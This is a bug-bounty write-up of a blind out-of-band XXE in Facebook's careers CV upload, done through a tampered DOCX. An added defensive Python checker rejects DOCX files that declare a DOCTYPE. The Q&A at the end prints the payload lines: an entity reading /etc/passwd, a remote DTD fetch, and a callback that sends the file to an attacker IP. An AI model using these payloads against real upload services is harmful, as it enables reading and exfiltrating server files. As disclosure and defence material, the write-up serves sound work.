One day I decided to stop hunting bugs in the Facebook Android, iOS and Windows Phone apps and start hunting bugs in the facebook.com website. I asked myself: can I hack Facebook, or any of Facebook’s websites or servers? I said, why not?!
Facebook Tough Security:
Facebook, as you know, is pretty secure: many people have reported high-severity security bugs since 2010, and in late 2013 Facebook patched a dangerous XML External Entity (XXE) processing vulnerability affecting OpenID.
According to this post by their security team, all of their servers were patched: https://www.facebook.com/BugBounty/posts/778897822124446
I thought it was a DEAD end and that I wouldn’t find any XXE vulnerabilities after Facebook patched their servers with the Takedown tool they developed, but I challenged myself to find an XXE in Facebook, and after some time digging and hunting I found this URL: https://www.facebook.com/careers/
I tried to upload my CV and it was accepted and uploaded successfully, BUT only PDF and DOCX files can be uploaded. I already knew that .docx files are zipped XML files developed by Microsoft, according to Wikipedia: http://en.wikipedia.org/wiki/Office_Open_XML
I simply opened MS Word 2010, typed some random text and saved it on my desktop as CV.docx. After that I successfully uploaded it to Facebook and, as you would expect, nothing fancy happened, but I had to find a vulnerability today or I would lose my challenge.
Injecting XML Payload inside CV.docx to read /etc/passwd:
I quickly opened CV.docx with the 7-Zip program on Windows 7 and extracted all of its contents. Inside I found some XML files, and I decided to open this one, [Content_Types].xml, and insert this innocent XML code:
The Evil Twin:
I already had another file, ext.dtd, waiting in the mohaab007 directory, and here is the content of ext.dtd:
Now I had a forged CV.docx file ready to rock. After that I opened port 80 on my home router and started Python’s simple HTTP server:
mohamed:~ mohaab007$ sudo python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 …
I inserted my external IP address, and all I wanted to see was a line in the Python HTTP server’s output showing that something was trying to connect to me. Now everything was ready, so I uploaded CV.docx to https://www.facebook.com/careers/ and waited a minute, but nothing happened.
I told myself it was a total failure and that I would check my Facebook profile instead, chat with some friends and play a game or something after this long FAILED attempt. I spent about 15 minutes or so chatting and browsing, and then it was time to stop the Python HTTP server and close Facebook and everything else.
I was about to close my terminal window when I was shocked to see that something had connected to my Python HTTP server:
I said WOOOOOOT: I had forced a server belonging to Facebook to connect to my Python HTTP server in a sneaky way, and now I could DO:
1- DoS on the parsing system by making it open, e.g. file:///dev/random | file:///dev/urandom | file://c:/con/con
2- TCP scans using HTTP external entities (including behind firewalls, since application servers often have a world view different from that of the attacker)
3- Unauthorised access to data stored as XML files on the parsing system’s file system (of course the attacker still needs a way to get this data back)
4- DoS on other systems (if the parsing system is allowed to establish TCP connections to other systems)
5- NTLM authentication material theft by initiating UNC file access to systems under attacker control (far fetched?)
6- Doomsday scenario: a widely deployed and highly connected application vulnerable to this attack may be used for DDoS.
7- Directory listing, reading system and application files and, in some cases, executing system commands using the PHP expect:// wrapper.
I tried to read system files, but either the application didn’t have the privileges to read them, or some protection was in place, or ... BUT I was 100% sure it was a blind, out-of-band (OOB) XXE. It was also a time-consuming process, because I had to upload a file and then wait 15 minutes or more for the result.
I didn’t waste much time and reported it to the Facebook security team. They rejected my bug report and said:
I sent a reply and they said:
Now I was LOST, and I said to myself, HAHAHA, it was a good time but it’s over and it isn’t a vulnerability after all. Still, I had received two connections from Facebook’s server, and the CV.docx file was corrupted and couldn’t be opened with MS Office.
The Hope and The Promise:
After exchanging emails with the Facebook security team, I got this reply:
Now it was time to take a rest and wait for them to fix it...
Now it is fixed, and Facebook rewarded me with a nice bounty. After that I found similar vulnerabilities in other websites using the same method.
The funny thing is that Facebook said they had patched all of their servers by adding this line: libxml_disable_entity_loader(true). However, I forced a Facebook server to parse my external entities and do what I wanted, and you can watch a video below showing how I did it.
POC Video (Facebook Blind XXE OOB): http://web.archive.org/web/20160315025854if_/http://www.youtube.com/embed/G17cdBicmJg?wmode=opaque&enablejsapi=1
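The check below is an added example, not code from the original post or from Facebook. It shows the kind of upload-side control that does not depend on a single process-wide parser setting such as libxml_disable_entity_loader(true): a DOCX is a ZIP of XML parts, and a legitimate Office document never needs a DOCTYPE or entity declaration in any of them, so the handler can refuse the file before a full XML parser ever sees the injected declaration. The two sample documents are constructed in memory, and the external DTD host in the tampered one is a placeholder.

```python
"""Reject uploaded DOCX files whose XML parts declare a DOCTYPE or external entity.

Added example (not from the original post). Assumes the upload is available as
bytes; the sample documents below are constructed in memory.
"""
import io
import zipfile
from xml.parsers import expat


class UnsafeDocx(ValueError):
    """Raised when a DOCX part carries a DOCTYPE or references an external entity."""


def _checking_parser(part_name):
    """Return an expat parser that aborts as soon as it meets a DOCTYPE or external entity."""
    parser = expat.ParserCreate()

    def on_doctype(doctype_name, system_id, public_id, has_internal_subset):
        # Fires at '<!DOCTYPE ...' before the internal subset is read, so an
        # injected <!ENTITY % ... SYSTEM ...> declaration is never evaluated.
        raise UnsafeDocx(f"{part_name}: DOCTYPE '{doctype_name}' is not allowed in a DOCX part")

    def on_external_entity(context, base, system_id, public_id):
        # Defence in depth: expat never fetches external entities on its own;
        # refusing here makes the policy explicit if the DOCTYPE check is ever relaxed.
        raise UnsafeDocx(f"{part_name}: external entity reference to {system_id!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    return parser


def check_docx_parts(docx_bytes):
    """Parse every XML part of the DOCX and return their names, or raise UnsafeDocx."""
    checked = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith((".xml", ".rels")):
                continue  # binary media such as images are not XML
            parser = _checking_parser(name)
            try:
                parser.Parse(zf.read(name), True)
            except expat.ExpatError as exc:
                raise UnsafeDocx(f"{name}: malformed XML ({exc})") from exc
            checked.append(name)
    return checked


def is_safe_upload(docx_bytes):
    """Boolean wrapper suitable for an upload handler (corrupt ZIPs are rejected too)."""
    try:
        check_docx_parts(docx_bytes)
    except (UnsafeDocx, zipfile.BadZipFile):
        return False
    return True


# --- constructed sample documents (not real uploads) ------------------------
_DOCUMENT_XML = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    b'<w:body><w:p><w:r><w:t>Hello</w:t></w:r></w:p></w:body></w:document>'
)

BENIGN_CONTENT_TYPES = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    b'<Default Extension="xml" ContentType="application/xml"/>'
    b'</Types>'
)

# Same part with a DOCTYPE pointing at an external DTD; the host is a placeholder.
TAMPERED_CONTENT_TYPES = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<!DOCTYPE Types [<!ENTITY % dtd SYSTEM "http://attacker.invalid/ext.dtd">]>'
    b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    b'<Default Extension="xml" ContentType="application/xml"/>'
    b'</Types>'
)


def build_docx(content_types_xml):
    """Build a minimal two-part DOCX in memory from the given [Content_Types].xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types_xml)
        zf.writestr("word/document.xml", _DOCUMENT_XML)
    return buf.getvalue()


if __name__ == "__main__":
    print("benign  :", is_safe_upload(build_docx(BENIGN_CONTENT_TYPES)))    # True
    print("tampered:", is_safe_upload(build_docx(TAMPERED_CONTENT_TYPES)))  # False
```

The check is independent of whichever library later renders or indexes the document, which matters when several services (a PHP front end, a Java or Python converter) each parse the same upload with their own XML settings; the DOCTYPE handler also rejects the document even when, as in the post, it is already too corrupted for MS Office to open.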
The Unexpected Reward:
I am listed in the Facebook White Hats (2014):
The Bottom Line: Facebook was suffering from an unexpected and sneaky XXE vulnerability, but they fixed it and rewarded me for helping them.
Compare the risks:
Here is a comparison between the old XXE (OpenID) and my XXE (DOCX):
Facebook’s Official Reply:
1. How did you put the extracted Docx data back into a docx?
I opened CV.docx using the 7-Zip Windows app, inserted the XML code, then closed 7-Zip and saved the changes.
2. What do you mean you put the ext.dtd into your directory?
The purpose of a DTD (Document Type Definition) like ext.dtd is to define the legal building blocks of an XML document. Using an external DTD file to exfiltrate data from other entities, like SYSTEM entities, is a trick from Alexey Osipov and Timur Yunusov.
3. In this part, “http://184.108.40.206/FACEBOOK-HACKED?%25file;’>”, would I replace that IP with my own?
4. Do you think this would work on other job-type websites where you can submit a resume, or just specifically Facebook?
Yes, I tried it on other websites like coinbase.com, and it worked: I was able to read system files.
5. In the part where it says “I inserted my external IP address and all I want to see is a response in python http server saying that something is trying to connect to me”, where did you insert the IP?
I inserted my IP in the ext.dtd file:
<!ENTITY % all "<!ENTITY &#x25;send SYSTEM 'http://220.127.116.11/FACEBOOK-HACKED?%25file;'>">
and in the XXE payload:
<!DOCTYPE root [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://18.104.22.168/ext.dtd">
6. What exactly did all that code you input do, specifically?
I highly recommend that you read this post: